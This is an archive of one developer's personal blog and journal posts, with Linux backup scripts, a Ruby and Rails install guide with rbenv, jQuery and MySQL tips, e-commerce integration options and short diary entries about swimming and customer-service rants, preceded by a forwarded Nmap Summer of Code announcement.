<p>This is a welcome boost for open source.<br>Shame i'm no longer a student.</p>
<p>-------- Original Message --------<br>Subject: Google sponsors Nmap summer student developers<br>Date: Thu, 2 Jun 2005 02:56:52 -0700<br>From: Fyodor <br>To: <EMAIL></p>
<p>Hello everyone,</p>
<p>Yesterday, Google announced their first Summer of Code program. This<br>innovative and generous program provides $4,500 stipends to each of<br>200 university students to create or enhance open source software<br>during their summer break. I am pleased to announce that Nmap is one<br>of 40 open source projects that Google selected for this program. We<br>would be pleased to work with one or more students to extend the power<br>of Nmap. You get paid, gain valuable experience and a great resume<br>booster, while the Nmap project and users benefit from your valuable<br>contributions.</p>
<p>You have until June 14 to apply if you are interested, though your<br>chances may be better if you apply sooner. If you do fill out the<br>application, please also send me the project description and a brief<br>bio describing how your experience fits the project. Also let me know<br>what school you attend. I have written up some project ideas, though<br>you are free to submit whatever cool idea your heart desires.</p>
<p>Here are the relevant URLs:</p>
<p>Nmap Project Ideas: <a href="http://www.insecure.org/nmap/GoogleGrants.html">http://www.insecure.org/nmap/GoogleGrants.html</a><br>Google's Summer of Code Page: <a href="http://code.google.com/summerofcode.html">http://code.google.com/summerofcode.html</a><br>Participant FAQ: <a href="http://code.google.com/summfaq.html">http://code.google.com/summfaq.html</a><br>Application Form: <a href="http://code.google.com/soc_application.html">http://code.google.com/soc_application.html</a></p>
<p>Good luck!<br>-Fyodor</p>
<p>_______________________________________________<br>Sent through the nmap-hackers mailing list<br>http://cgi.insecure.org/mailman/listinfo/nmap-hackers</p>
<file_sep>---
layout: post
title: backing up your home folder
date: '2007-06-20T20:59:00.000Z'
author: <NAME>
tags:
- backup
- ubuntu
- linux
- script
modified_time: '2007-06-20T23:10:18.919Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1206082451587115261
blogger_orig_url: https://timwise.blogspot.com/2007/06/backing-up-your-home-folder.html
---
Here I outline the solution I chose for backing up my life, er... I mean home folder. (I'm sure there's life outside /home/tim somewhere...)
My requirements were:
* backup to dvd+rw
* \>20GB of data to back up
* no obscure formats (in case I don't have the backup tool when I need to restore)
I looked at several solutions for backups but ended up writing scripts to meet my needs.
The main script creates a tar file of my home directory, excluding certain items, which is then split into files suitable for writing to dvd+rw discs, with tar based verification, md5sums and file list text files created at the same time.
The reason for splitting to 3 files per disc is that the [iso 9660](http://en.wikipedia.org/wiki/ISO_9660#The_2_GiB_.28or_4.2GB_depending_on_implementation.29_file_size_limit) spec has a 2GB file size limit, and it's important that the discs are as simple as possible (ie no UDF) to aid recovery in awkward situations. This is also why I avoided compression.
backup_home.sh
#!/bin/bash -v
#DVD+R SL capacity 4,700,372,992 bytes DVD, (see [wikipedia on DVD](http://en.wikipedia.org/wiki/DVD))
#ISO max file size 2GB. 4.38GB/3 = 1,566,790,997bytes = 1,494MB
#1,490MB to leave some space for listings and checksums
tar -cvv --directory /home tim --exclude-from backup_home_exclude.txt | split -b 1490m - /var/backups/tim/home/home.tar.split.
cd /var/backups/tim/home
md5sum home.tar.split.* > home.md5
cat home.tar.split.* | tar -t > home_file_list.txt
cat home.tar.split.* | tar -d --directory /home tim > home_diff.txt
ls -l home.* > home_backup_files.txt
backup_home_exclude.txt
tim/work*
tim/.Trash*
tim/.thumbnails*
This leaves me with a big pile of split files (named .aa, .ab etc) and a few text files. I proceeded to write 3 split files per disc, and put the 4 text files on every disc for convenience. I used gnome's built in DVD writing to create the discs.
I also wanted to verify the md5 checksums as the discs were created, so I wrote another little script to make life easier. This ensures the newley written disc has been remounted properly, and runs the md5 check. So long as the 3 relevant checksums came out correctly on each disc I can be reasonably confident of recovering the data should I need it.
"eject -t" closes the cdrom, which is handy.
reload_and_verify.sh
#!/bin/bash -v
cd /media
eject
eject -t
mount /media/cdrom
cd cdrom
md5sum -c home.md5
cd /media
eject
In addition to the above mechanism (which is a pain at best, mostly due to media limitations) I keep my machines in sync with [unison](http://www.cis.upenn.edu/~bcpierce/unison/) which I strongly recommend for both technical and non-technical users. I gather it also runs on microsoft (who?), so you might find it useful if you are mid transition.
<file_sep>---
layout: post
title: Running IE Application Compatibility VPC under Virtual Box
date: '2012-04-18T21:59:00.005Z'
author: <NAME>
tags:
- virtualbox
- workaround
- vpc
- windows
- linux
modified_time: '2013-09-09T19:58:02.140Z'
thumbnail: http://2.bp.blogspot.com/-6nGRU7FIXbw/T487RpEWm5I/AAAAAAAAAE0/TPYAZzmUYy8/s72-c/sata-controller.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1232309832274484466
blogger_orig_url: https://timwise.blogspot.com/2012/04/running-ie-application-compatibility.html
---
This post is no longer necessary as microsoft now provide official virtualbox
images, yay!
[http://www.modern.ie/en-us/virtualization-tools#downloads](http://www.modern.ie/en-us/virtualization-tools#downloads)
----
Microsoft provide Virtual PC images for testing your website with IE. You can
download them from
[http://www.microsoft.com/download/en/details.aspx?id=11575](http://www.microsoft.com/download/en/details.aspx?id=11575)
Note that the XP image has now expired so is of no use; it will reboot immediately
after login.
I wanted to make use of the Win 7 / IE 9 image, however Virtual PC is
unavailable on Linux. Fortunately VirtualBox can mount Virtual PC's disk
images.
For me the image would get half way through booting windows, and then
blue-screen (BSOD). I discovered that it was possible to get past this by
removing the SATA controller the machine's settings, and instead adding the
disk under the IDE controller. After that the machine booted successfully.

* * *
Capturing the BSOD: basically press F8 after a lot of rebooting, and select
"disable automatic restart on system failure" (ref:
[http://www.webtlk.com/2009/07/02/how-to-stop-windows-7-reboot-loop/](http://www.webtlk.com/2009/07/02/how-to-stop-windows-7-reboot-loop/))


<file_sep>---
layout: post
title: MCTS in ASP.NET 3.5 - Mission accomplished.
date: '2009-12-18T09:59:00.005Z'
author: <NAME>
tags:
- mcts
- certification
- microsoft
modified_time: '2009-12-18T10:06:50.213Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2991052489429405502
blogger_orig_url: https://timwise.blogspot.com/2009/12/mcts-in-aspnet-35-mission-accomplished.html
---

I am now a *Microsoft Certified Technology Specialist in .NET Framework 3.5, ASP.NET Applications*, which is nice.
<file_sep>---
title: "beer, linux & aaar."
date: 2004-03-24
slashdot_url: https://slashdot.org/journal/66222/beer-linux-aaar
---
<p>Was going to write yesterday but things have been on code "aaaaaarrr" lately due to absence of J.</p>
<p>Exercise this week: nil (apart from commutating)<br>Beer this week: (b)(b)(b)(b)(b)(b)(b)(b)(b)</p>
<p>I was going to say that I'd nearly succeeded in booting a computer into linux from a usb key memory device, using <a href="http://rz-obrian.rz.uni-karlsruhe.de/knoppix-usb/">this</a> reference. And damn small linux as stated, which I already knew about.</p>
<p>Struggling to recompile the kernel image on my SuSE 9 box.<br>Why do it? Because I should be able to. And it's satisfying. Who needs sleep anyway?</p>
<file_sep>---
title: "Swimming"
date: 2003-12-19
slashdot_url: https://slashdot.org/journal/55743/swimming
---
<p>Didn't remember to write entry on Thur as had manic morning at work (what's new?) then xmas drinks in the afternoon (and we won't talk about the evening other than saying I regret it... urrrgh).<br>In other news, I made it into the pool in time for 35 mins swimming and managed 22 lengths I think. Including two not very successful attempts at a front crawl / breathing water.</p>
<p>Irrelevantly: I just got vnc viewer working on my P800 and can actually see these words in this form on it. Woo! Cool, but not useful (sorry Negi).</p>
<file_sep>---
layout: post
title: GpsPrune file matching
date: '2011-11-09T00:08:00.001Z'
author: <NAME>
tags:
- gps
- gpx
- gpsprune
- oss
modified_time: '2011-11-09T00:11:55.633Z'
thumbnail: http://farm7.static.flickr.com/6215/6327537524_63e500602c_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2383499498516356796
blogger_orig_url: https://timwise.blogspot.com/2011/11/gpsprune-file-matching.html
---
[](http://www.flickr.com/photos/tim_abell/6327537524)
I wanted to be able to load a whole bunch of gpx traces and see which one was where on the map. I've got a basic version working though it's a bit rough around the edges.
The code is available for you to grab from [http://github.com/timabell/gpsprune](http://github.com/timabell/gpsprune)
And above is a pic of it in action, having opened a load of files at once and clicked on one of them in the list
<file_sep>---
title: "post-relational databases in the real world"
date: 2005-07-20
slashdot_url: https://slashdot.org/journal/112339/post-relational-databases-in-the-real-world
---
<p>A Simpler Way of Getting<nobr> </nobr>.NET Objects out of ADO.NET<br>By <NAME><br><a href="http://www.15seconds.com/Issue/031013.htm">http://www.15seconds.com/Issue/031013.htm</a></p>
<p>A very informative article on the practical issues and advantages of using a real object database (Matisse) versus the de-facto relational + object mapping solutions.</p>
<file_sep>---
layout: post
title: My mum and her super ceramics
date: '2007-05-28T02:18:00.001Z'
author: <NAME>
tags:
- ceramics
- mum
modified_time: '2007-05-28T02:22:00.450Z'
thumbnail: http://farm1.static.flickr.com/252/516198134_4f3854a2d4_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5927976670841268452
blogger_orig_url: https://timwise.blogspot.com/2007/05/my-mum-and-her-super-ceramics.html
---
My mum has started posting [pics of her fab ceramics work on
flickr](https://www.flickr.com/photos/sarah_abell/). Go mum!
One of her early pieces has pride of place in my display cabinet and is admired
by all. Watch this space for more funky designs as she heads towards the end of
uni.
<file_sep>---
title: "yacht"
date: 2005-07-27
slashdot_url: https://slashdot.org/journal/112954/yacht
---
<p>Me on a boat with work people earlier this month. Hurrah.</p>
<p><a href="http://www.no2.co.uk/gallery/view_album.php?set_albumName=eMapSite-com-Sailing-Weekend-10th-July-2005&page=1">http://www.no2.co.uk/gallery/view_album.php?set_albumName=eMapSite-com-Sailing-Weekend-10th-July-2005&page=1</a></p>
<file_sep>---
layout: post
title: Reliable javascript checkbox events
date: '2011-05-18T22:30:00.004Z'
author: <NAME>
tags:
- dhtml
- javascript
- html
- jQuery
- web
modified_time: '2011-05-18T23:24:56.428Z'
thumbnail: http://farm4.static.flickr.com/3652/5734606641_c61a818d47_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7525465672135952518
blogger_orig_url: https://timwise.blogspot.com/2011/05/reliable-javascript-checkbox-events.html
---
[](http://www.flickr.com/photos/tim_abell/5734606641/)
Some sites have checkboxes which show/hide another element when you click them. This is a handy feature, but not all sites take into account the fact that firefox remembers the contents of a form when you reload the page (this is a good thing).
So here's how you avoid that with jQuery:
<script type="text/javascript">
$(function() {
// initialise show/hide to match the checkbox value
$('.targetelements').toggle($('#mycheckbox').attr('checked'));
// attach click handler for show/hide to checkbox
$('#mycheckbox').click(function(){ $('.targetelements').toggle(this.checked);})
});
</script>
Simples!
You could use the same principle without jQuery if you need to. Simply read the value of the checkbox with javascript the old fashioned way before deciding whether to hide when you initialise your page.
<file_sep>---
title: "Bonjour"
date: 2004-08-16
slashdot_url: https://slashdot.org/journal/80470/bonjour
---
<p>Today, I have mostly been riding a <a href="http://www.santacruzmtb.com/bicycles/vpfree.php">vp free</a>, down mountains. Most excellent. Some rain, some sun, lots of stunning <a href="http://www.timwise.co.uk/images/IMG_3894.JPG">scenery</a>.</p>
<file_sep>---
title: "Swimming"
date: 2004-01-20
slashdot_url: https://slashdot.org/journal/58974/swimming
---
<p>26 lengths today, 45 mins. Then a bacon sarny in the local caf.</p>
<file_sep>---
title: Integrating ShipStation with QuickBooks Desktop
layout: post
---
A possible customer of my [new eCommerce Integration
business](https://ecommerceintegrations.co.uk/) popped up with an interesting
problem: how to have orders that are entered into [QuickBooks
Desktop](https://quickbooks.intuit.com/desktop/) automatically create matching
entries in [ShipStation](https://www.shipstation.com/).
> "How can I get my orders from QuickBooks into ShipStation without my staff manually retyping them?"
## What is ShipStation?
It is a one-stop order shipping interface for shipping your physical outbound
orders that can in turn talk to all the actual couriers so you don't need to
deal with them individually. It connects to Royal Mail, Hermes, DPD etc.
## Connecting ShipStation to QuickBooks Desktop
There isn't a direct way of connecting them together, so that means we need
something to do the work of pulling orders out of QuickBooks and pushing them
into ShipStation.
Here's two pieces of software that can connect the two systems together:
## Connex
* <https://www.shipstation.com/partners/connex-quickbooks/>
* <https://www.syncwithconnex.com/>
* Connex is a bit like Codeless BPA in that it enables a flow of orders, but specific to QuickBooks rather than having many connectors on both sides.
* This page lists exactly what pieces of data will be transferred: <https://help.syncwithconnex.com/hc/getting-started-with-shipstation>
* [ShipStation help page on Connex for QuickBooks](https://help.shipstation.com/hc/en-us/articles/360026142191#UUID-b13db029-1f01-b9b8-52f3-71e0c4caa0be)
* The [base price for Connex is $199/month](https://www.syncwithconnex.com/products-2/) at time of writing.
## Codeless BPA
* <https://www.codelessplatforms.com/business-process-automation-platform/>
* Codeless has a [ShipStation connector](https://www.codelessplatforms.com/connectors/shipstation-integration/)
* BPA Platform starts from £175/month billed annually.
* We'd need to do some investigation of the method of integrating QuickBooks Desktop with Codeless BPA.
## Connex versus Codeless
Both Codeless BPA and Connex have similar monthly costs, and both will need
setting up, so choosing which to go with is going to come down to which option
fits your businesses needs better now and in the longer term. Connex will solve
the immediate problem, but Codeless has more connections you can use in the
future.
## DBSync
* <https://www.mydbsync.com/workflow/shipstation-quickbooks-integration>
* Cloud and On-Premise offerings.
* "Chat for pricing"
## Unify by Webgility
* ShipStation integration: <https://www.webgility.com/integrations/shipstation>
* QuickBooks desktop integration: <https://www.webgility.com/integrations/quickbooks>
* [From $39/month billed annually](https://www.webgility.com/pricing) at time of writing.
* [ShipStation integration help page](https://help.shipstation.com/hc/en-us/articles/360025856492-Unify-by-Webgility?queryID=2ab3382fc895786ba9cda0cfbc556a5b).
## Automate.io
* <https://automate.io/integration/quickbooks/shipstation>
* [From free to $159/month](https://automate.io/pricing)
## TradeGecko (retired)
* This is [being retired](https://www.tradegecko.com/sunset), but mentioned for completeness.
* <https://support.tradegecko.com/hc/en-us/articles/201825933-ShipStation-Integration-Setup-Guide>
## To integrate now, or to change technology?
As everything moves to the cloud it's worth considering whether to invest
further in your existing desktop-based technology choices, or to take the
opportunity to move to cloud based accounting and ERP systems before looking to
connect them together.
## Get in touch
Did I miss an option? Let me know!
Can I help you or someone you know with something? Reach out!
<file_sep>---
layout: post
title: Home server docker-compose
date: 2017-08-29 21:26:28.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/08/29/home-server-docker-compose/"
---
Another step in making a throw-away home server: docker-compose.
Find my compose file and setup script at <https://github.com/timabell/home-server-docker-compose>
I learned how to use docker-compose while working on reverse-proxying sdv, find out more: <https://github.com/timabell/sdv-docker>
<file_sep>---
layout: post
title: stop motion animation on linux
date: '2008-03-27T21:29:00.007Z'
author: <NAME>
tags:
- photography
- howto
- animation
- linux
modified_time: '2011-04-24T07:58:44.332Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-4371985220813850741
blogger_orig_url: https://timwise.blogspot.com/2008/03/stop-motion-animation-on-linux.html
---
A quick howto...
1. Take a series of photos on your digital camera.
2. Copy them onto your linux box.
3. shrink the photos to a more manageable size:
`mogrify -verbose -resize 600x400 -quality 60% *.JPG`
4. Preview the animation with animate:
`animate -delay 8 *`
5. Optionally rotate the image to match the exif information from your camera (mine was sideways):
`exiftran -ai *`
6. Convert the jpg files to png:
mogrify -format png *.JPG
7. Create the flash animation from the PNG files:
`png2swf -r 15 -o flower2.swf -v -X 399 -Y 600 *.png`
8. Create an html file to hold the animation containing the following:
```
<object>
<param name="movie" value="flower2.swf" />
<param name="loop" value="true" />
<param name="quality" value="high" />
<embed src="flower2.swf" width="399" height="600" />
</object>
```
9. Write a blog article to tell everyone about it ;-)
"history" is a handy command for reviewing your activities for writing up your achievements.
And here it is, providing I've kept up with my hosting fees and not been slashodotted:
<div style="padding: 1em; border: 2px solid black;">
<object>
<param name="movie" value="http://timwise.co.uk/photos/flower2.swf">
<param name="loop" value="true">
<param name="quality" value="high">
<embed src="https://raw.githubusercontent.com/timabell/timwise.co.uk/master/assets/flower2.swf" width="399" height="600">
</object>
</div>
Update, that was an embedded flash file ^ which isn't really a thing on the internet any more.
The original flash file: [flower2.swf](https://raw.githubusercontent.com/timabell/timwise.co.uk/master/assets/flower2.swf)
<file_sep>---
title: "no cycling for me"
date: 2004-09-29
slashdot_url: https://slashdot.org/journal/85317/no-cycling-for-me
---
<p>So this evening I went for a run.<br>And I ran all the way round the outside of Uni campus in 22mins non-stop (kebab fun to kebab van). This shall hence forth be known as the kebab run.<br>Mr K & AB came too, which was nice.</p>
<file_sep>---
title: "Morning"
date: 2004-01-20
slashdot_url: https://slashdot.org/journal/58959/morning
---
<p>Look, I'm up. At 6AM, just to go swimming.</p>
<p>Weird.</p>
<p>Might as well download Mandrake <a href="http://www.mandrakelinux.com/en/mandrakemove/">Move</a> while I'm at it.</p>
<file_sep>---
layout: post
title: automatic mysql backups
date: '2012-06-14T15:10:00.000Z'
author: <NAME>
categories: [howto, mysql, linux]
modified_time: '2012-06-14T15:12:25.991Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7356368576752162435
blogger_orig_url: https://timwise.blogspot.com/2012/06/automatic-mysql-backups.html
---
On a debian server with mediawiki installed and running with a local mysql.
```
root@myserver:~# apt-get install automysqlbackup
root@myserver:~# crontab -e
# m h dom mon dow command
5 4 * * * automysqlbackup
root@myserver:~# automysqlbackup
root@myserver:~# cd /var/lib/automysqlbackup/
root@myserver:/var/lib/automysqlbackup# find .
.
./weekly
./weekly/wikidb
./weekly/information_schema
./daily
./daily/wikidb
./daily/wikidb/wikidb_2012-06-14_16h03m.Thursday.sql.gz
./daily/information_schema
./daily/information_schema/information_schema_2012-06-14_16h03m.Thursday.sql.gz
./monthly
```
Result! No longer need to write a custom cron script each time.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/7255107648/"><img
src="https://live.staticflickr.com/7226/7255107648_929530d9e0.jpg" alt="Ducklings at henley-on-thames"></a>
</div>
Project homepage:
[http://sourceforge.net/projects/automysqlbackup/](http://sourceforge.net/projects/automysqlbackup/)
<file_sep>---
layout: post
title: New year new blog, happy 2017
date: 2017-01-17 01:00:09.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/01/17/new-year-new-blog-happy-2017/"
---
I've used blogger for years, but the layout for code has not improved for a long time. I've also found my domain's website stagnating because of the hassle of updating it, so I've moved the whole kaboodle to [wordpress.com](https://wordpress.com/).
Find my old blog and all its content at <http://timwise.blogspot.co.uk/>
I'm not migrating the content from blogger because I think google will keep it online, and [cool URIs don't change](https://www.w3.org/Provider/Style/URI.html). I've never been convinced of the value of people lugging their blog posts from one platform to the next, it seems to break more than it fixes most of the time. Like the one where the old host didn't need the trailing slash at the end of the URL and the new host did, breaking half the incoming links. It's only because I'm a web dev that I guessed what the fix was.
Enough about that anyway. Happy new year :-)
Please do add my new blog to your favourite blog reading software / rss reader etc., and do drop me a line on [<EMAIL>](mailto:<EMAIL>) just so I know you're out there!
The original of the header is a photo I took myself which you can find on flickr: [https://www.flickr.com/photos/tim_abell/17111067690/](https://www.flickr.com/photos/tim_abell/17111067690/)
<file_sep>---
title: "swimming"
date: 2004-05-11
slashdot_url: https://slashdot.org/journal/71130/swimming
---
<p>Hello again.</p>
<p>Success of the week (Mon eve):<br>Swimming 400m in (more or less) one attempt.<br>Time taken: 12mins<br>Lengths: 16.</p>
<p>Yay.</p>
<p>Also, for all who didn't know I was the butler (and no, I didn't do it; yawn), I very much enjoyed my stage debut.</p>
<p>I even got recognised in the chinese on sat night by a young lady who had seen the friday night show - joy.</p>
<p>Tim</p>
<file_sep>---
title: "Pay as you drive won't work because..."
date: 2005-06-06
slashdot_url: https://slashdot.org/journal/108638/pay-as-you-drive-wont-work-because
---
<p><a href="http://news.bbc.co.uk/1/hi/uk/4610755.stm">http://news.bbc.co.uk/1/hi/uk/4610755.stm</a></p>
<ul>
<li>People won't fit tracking devices to existing cars - especially if they have to pay for them</li>
<li>Cost of driving is only a dis-incentive if known in advance of the journey.</li>
<li>etc.</li>
<li>rant. grrr.</li>
</ul>
<p>edit: more thoughts</p>
<ul>
<li>if motorways are higher cost, large vehicles will use A & B roads instead, which is bad for cyclists.</li>
<li>why is congestion such a bad thing anyway? isn't it the best incentive for people to seek alternative methods of transport?</li>
<li>why is this any better than the current tax per mile, aka fuel tax? I think perhaps this is a reaction to the revolt against fuel tax rises.</li>
</ul>
<p>If you want to reduce congestion, then apart from sudafed, the best example I've seen is the M25 variable (enforced) speed limit. I'd be more than happy to see this extended to all motorways.</p>
<p>As usual without decent alternatives reducing congestion is a losing battle. Have you taken a regional bus / train service lately? My most recent experience was the Woodley to Reading bus, which took at least half an hour (when it eventually showed up) for a journey I can do in 15 mins on my mountain bike. Add to that no guarantee of a ride home after a few beers and frankly I'd rather drive and put up with ten minutes in traffic.</p>
<p>grrrr.</p>
<p>Maybe I shouldn't listen to the news. Besides, b3ta.com is funnier.</p>
<file_sep>---
title: "Java!=javascript (geek entry)"
date: 2005-06-30
slashdot_url: https://slashdot.org/journal/110732/javajavascript-geek-entry
---
<p><a href="http://www.vsj.co.uk/dotnet/display.asp?id=296">http://www.vsj.co.uk/dotnet/display.asp?id=296</a></p>
<p>Just goes to show you can have a degree <i>and</i> an MCSD and <i>still</i> not know the difference between Java and javascript!</p>
<p>(see section "Whistles and Bells")</p>
<file_sep>---
title: "Vodafone - sucking"
date: 2003-09-16
slashdot_url: https://slashdot.org/journal/46073/vodafone---sucking
---
<p>Sent a message to vodafone saying that I wasn't too impressed.<br>I know ranting gets you nowhere but I feel better nonetheless.</p>
<p>The rant:<br>-------------------------------<br>I have been with vodafoam for about 2 months now and I am SERIOUSLY DISSILUSIONED with every aspect of your business.</p>
<p>Since I joined, you have failed to set up my direct debit, twice, blocked my outgoing calls, twice (including calls to 191, you morons!) - for no good reason. Been unable to answer the most basic questions over the phone, such as what has happened to the money I have sent you. And, been alternately "unable" and "too incompetent" to set up normal voicemail notification.</p>
<p>In addition, your website is one of the worst commercial sites I have seen in a long time. I have never seen a site before where your session expires without even being logged on. Appalling. As you may have guessed, I cannot view my bill online as promised because of you inability to set up a direct debit. And the point of that would be what?</p>
<p>I would normally expect at least some kind of apology and some remedial action, however your corporation appears to have its head so far up its own backside that it has no idea what it's like to be one of your customers. I shall look forward to your bland impersonal corporate excuse for a response.<br>--------------------------</p>
<file_sep>---
layout: attachment
title: Sql Data Viewer - Mozilla Firefox_144
date:
type: attachment
parent_id: '534'
published: false
password: ''
status: inherit
categories: []
tags: []
meta: {}
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/08/13/running-sdv-in-docker/sql-data-viewer-mozilla-firefox_144/"
---
<file_sep>---
title: "new year? when was that?"
date: 2005-03-08
slashdot_url: https://slashdot.org/journal/100287/new-year-when-was-that
---
<p>I wasn't there, I know nothing about it.<br><a href="http://timwise.co.uk/photos/newyear05/">http://timwise.co.uk/photos/newyear05/</a></p>
<file_sep>---
title: "update"
date: 2005-01-18
slashdot_url: https://slashdot.org/journal/95908/update
---
<p>dittons: sold<br>ntl proxy: banned from slashdot - so I shalln't be posting very often.<nobr> </nobr>:(</p>
<p>Everyone should now use Bebo, it's just what the doctor ordered.<br>You can get my new address and my mob number here:<br><a href="http://www.bebo.com/friends/138748a653587b0">http://www.bebo.com/friends/138748a653587b0</a><br>(but only if you give me yours!)</p>
<p>Description: "I am using a service that keeps contact details current, just update your own contact details and then the changes appear in selected friends address books. When I update my contact details you will see them in your address book."</p>
<file_sep>---
title: "a manual? for £££££?!"
date: 2006-07-19
slashdot_url: https://slashdot.org/journal/140082/a-manual-for-
---
<p>What kind of two bit fucked up piece of shit organisation expects you to *BUY* manuals for a product you have already paid for?!</p>
<p>Holy cow, that'd be canon.<br>"Selected User Manuals are available to purchase from Robert Scott..."<br><a href="http://www.canon.co.uk/Support/User_Manuals/index.asp">http://www.canon.co.uk/Support/User_Manuals/index.asp</a></p>
<p>Last fucking business they get from me.</p>
<p>And their support of linux consists of fingers in ears "la la la it doesn't exist".</p>
<p>I'm going to try and get a refund for my printer and buy one from a company who cares about their customer's experience.</p>
<p>Wankers.</p>
<file_sep>---
title: "Star gazing"
date: 2004-02-16
slashdot_url: https://slashdot.org/journal/62113/star-gazing
---
<p>I've got a <a href="http://news.bbc.co.uk/1/hi/sci/tech/3490657.stm">galaxy cluster</a> [bbc] in my name!!! Woo yay!</p>
<file_sep>---
title: "<NAME>"
date: 2005-10-21
slashdot_url: https://slashdot.org/journal/120313/hurricane-wilma
---
<p>A live view of the progress of <NAME>:<br><a href="http://earth.google.com/downloads.html">Google Earth</a> plus <a href="http://bbs.keyhole.com/ubb/placemarks/110283-Hurri.kmz">http://bbs.keyhole.com/ubb/placemarks/110283-Hurri.kmz</a></p>
<p>Once you've looked at this, take a look at the spectral overlay (in Places on left hand side)</p>
<file_sep>---
title: "Facial Fuzz"
date: 2004-08-16
slashdot_url: https://slashdot.org/journal/80495/facial-fuzz
---
<p>Forgot to mention earlier the thing I meant to say.</p>
<p>Beardy Tim is no more.</p>
<file_sep>---
title: "let the selling begin"
date: 2004-12-27
slashdot_url: https://slashdot.org/journal/94011/let-the-selling-begin
---
<p>I've made my first <a href="http://cgi.ebay.co.uk/ws/eBayISAPI.dll?ViewItem&item=5740624016&ssPageName=ADME:B:LC:UK:1">ebay entry</a></p>
<p>It's for those gargantuan Dittons that I don't have room for. Let me know if you know anyone who might be interested.</p>
<p>Tim</p>
<file_sep>---
layout: post
title: Installing ruby 2 + Rails 4 on Ubuntu 12.04 LTS
date: '2013-05-13T10:29:00.000Z'
author: <NAME>
tags:
- ruby
modified_time: '2014-10-16T17:36:56.124Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8035590818501389253
blogger_orig_url: https://timwise.blogspot.com/2013/05/installing-ruby-2-rails-4-on-ubuntu.html
---
Installing [Ruby](http://www.ruby-lang.org/) 2 + [Rails](http://rubyonrails.org/) 4 on [Ubuntu](http://www.ubuntu.com/) 12.04 LTS
_Update Dec 2013:_ You may also wish to read [benkwok's blog post on installing ruby and rails](http://benkwok.wordpress.com/2013/08/15/install-rails-on-ubuntu-12-04-lts-with-rbenv/). I've also [posted my notes from installing for an existing project](/2013/12/04/getting-rails-4-up-and-running-with/) which doesn't entirely replace this post but reflects my more recent learnings.
There's a few of these blog posts around, but here's mine for my own benefit (I'm sure this won't be the last time I do it!).
If you have a packaged ruby / rails / rvm / rbenv etc installed, get rid of them all, eg:
$ ruby --versionruby 1.8.7 (2011-06-30 patchlevel 352) [x86_64-linux]$ sudo apt-get remove ruby
Don't use [rvm](https://rvm.io/); and make sure it's been literally purged from your system. It's a pain to remove as it gets into all sorts of places and even _apt-get purge_ doesn't undo changes to the profile etc. If you want to know more about the reason for not using it then read the [rbenv "why" page](https://github.com/sstephenson/rbenv/wiki/Why-rbenv%3F), it's persuasive stuff.
My recommendation from experience so far is to use [rbenv](http://rbenv.org/) to install the latest and greatest RoR (Ruby on Rails). Don't bother with the ubuntu packaged version of rbenv (from apt etc) as you'll be off the beaten track and will have to figure out the ruby-build plugin installation yourself. The local user install is painless and works well. The instructions say to make sure rvm is removed first as it's incompatible.
* Sidenote, [http://rbenv.org/](http://rbenv.org/) is just a one-click link to [https://github.com/sstephenson/rbenv](https://github.com/sstephenson/rbenv)
* Direct link to [rbenv readme](https://github.com/sstephenson/rbenv#readme) (for your convenience)
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/8734272311"><img src="https://live.staticflickr.com/7308/8734272311_f49ccb1e42_k.jpg" alt="Minster Church, Boscastle"></a>
</div>
# rbenv installation
Install rbenv into your home directory:
$ git clone git://github.com/sstephenson/rbenv.git ~/.rbenv
Set up the environment as per the (ubuntu specific) [rbenv installation instructions](https://github.com/sstephenson/rbenv#installation):
$ echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.profile$ echo 'eval "$(rbenv init -)"' >> ~/.profile
Unless you've done anything before, there is no ~/.profile file before hand, so the contents will then be:
$ cat ~/.profileexport PATH="$HOME/.rbenv/bin:$PATH"eval "$(rbenv init -)"
Restart the login shell:
$ exec $SHELL -l
Check rbenv is now available:
$ rbenvrbenv 0.4.0-45-g060f141Usage: rbenv <command> [<args>]...
Set up the [ruby-build](https://github.com/sstephenson/ruby-build#readme) plugin (as linked in the [rbenv readme](https://github.com/sstephenson/rbenv#readme))
$ git clone https://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
Install the necessary ssl library:
$ sudo apt-get install libssl-dev
If you don't install the openssl development libraries you get this:
BUILD FAILED...The Ruby openssl extension was not compiled. Missing the OpenSSL lib?
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/8734303977"><img
src="https://live.staticflickr.com/7310/8734303977_566f96b159_k.jpg" alt="Looking out of a cave on the beach"></a>
</div>
# Ruby installation
Install the latest ruby (version name obtained from [release info on ruby blog](http://www.ruby-lang.org/en/news/2013/02/24/ruby-2-0-0-p0-is-released/)), takes 5-10 mins
$ rbenv install 2.0.0-p0
Now select the installed ruby as the default for your user (ref: [https://github.com/sstephenson/rbenv#choosing-the-ruby-version](https://github.com/sstephenson/rbenv#choosing-the-ruby-version))
$ rbenv global 2.0.0-p0 tim@atom:~$ ruby --versionruby 2.0.0p0 (2013-02-24 revision 39474) [x86_64-linux]
# Rails installation
Now as per the [Rails 4 RC1 announcement](http://weblog.rubyonrails.org/2013/5/1/Rails-4-0-release-candidate-1/) install the release candidate of Rails 4 (this was the latest at time of writing). Takes 5-10 mins.
$ gem install rails --version 4.0.0.rc1 --no-ri --no-rdoc
Tell rbenv to create the new shims and see the installed rails:
$ rbenv rehash$ rails --versionRails 4.0.0.rc1
* * *
All done! That wasn't so hard, it was all the blind alleys that took the time.
